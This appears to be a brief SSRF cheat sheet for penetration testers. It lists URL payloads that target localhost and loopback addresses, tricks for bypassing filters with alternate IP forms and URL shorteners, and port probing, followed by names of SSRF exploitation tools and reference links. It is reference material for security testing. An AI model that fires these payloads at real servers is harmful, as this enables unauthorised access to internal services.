🏂SSRF

SSRF Cheatsheet

Using localhost

http://localhost:80
http://localhost:443
http://localhost:22

Using 127.0.0.1

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22

Using 0.0.0.0

http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22

Filter Bypass

https://127.0.0.1/
https://localhost/
http://127.1/

Bypass Localhost with CIDR

http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

Bypass using URL Shortners

https://free-url-shortener.rb.gy/

https://shorter.me/

Brutefoce Ports

http://127.0.0.1:1337

Tools

• swisskyrepo/SSRFmap - Automatic SSRF fuzzer and exploitation tool

• tarunkant/Gopherus - Generates gopher link for exploiting SSRF and gaining RCE in various servers

• In3tinct/See-SURF - Python based scanner to find potential SSRF parameters

• teknogeek/SSRF Sheriff - Simple SSRF-testing sheriff written in Go

• assetnote/surf - Returns a list of viable SSRF candidates

• dwisiswant0/ipfuscator - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go.

REFERENCES

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md#tools

• https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery

• https://portswigger.net/web-security/ssrf

• https://shorter.me/

• https://free-url-shortener.rb.gy/